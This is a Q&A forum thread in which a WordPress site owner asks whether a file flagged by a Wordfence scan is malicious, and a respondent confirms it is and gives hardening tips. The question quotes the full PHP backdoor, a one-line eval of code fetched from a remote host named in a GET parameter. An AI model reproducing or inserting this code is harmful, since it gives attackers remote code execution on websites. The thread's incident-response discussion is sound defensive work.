Search code examples
wordpresswordfence

Wordpress warning - Backdoor:PHP/numeric.rce.8527


I have been looking at the Wordfence scan results on my site this morning and see 17 instances which seem to imply malware has ben installed on the server. I would be surprised if this were to be the case but wanted to be sure:

One example,

Filename: wp-admin/menu-header-cron.php File Type: Not a core, theme, or plugin file from wordpress.org. Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0aif (isset($_GET['limit'])) {\x0a eval(file_get_contents('http://' . $_GET['limit']));\x0a}

The issue type is: Backdoor:PHP/numeric.rce.8527 Description: Remote code execution malware

Looking at the file in question, the content of this file is:

<?php
if (isset($_GET['limit'])) {
eval(file_get_contents('http://' . $_GET['limit']));
}

Can anyone confirm whether this is an innocent file or something I need to quarantine/delete?

Also, has was this file created? It implies that remote code has the capability of creating new files in the wp-admin/ sub folder? Is there not a simple way to prevent this which would preclude any further instances.

Many thanks for any input


Solution

  • Answers:

    1. Yes, this is a dangerous file as already mentioned by @Everlyn Woodley. eval() is not considered safe in production at all.

    Further to verify, a quick grep "isset($_GET['limit'])" on source file of latest Wordpress package tells that its not part of it, hence again a dangerous code.

    1. Yes, someone is able to upload files on your server. Probably they have uploaded some kind of web-shell and can manipulate any file on your hosting account. Its pretty common though.

    2. To prevent it in future (given that you have successfully cleaned your current WP install), you can do few things, (there are plenty of articles so it would be redundant) but mentioning few might not hurt here:

    If you examine access log of a regular WP install, you will notice that there are tons of bots hitting with known-vulnerabilities mostly targeting plugins folder, simply changing plugins folder location along with other security measures mentioned above can significantly reduce such hacks.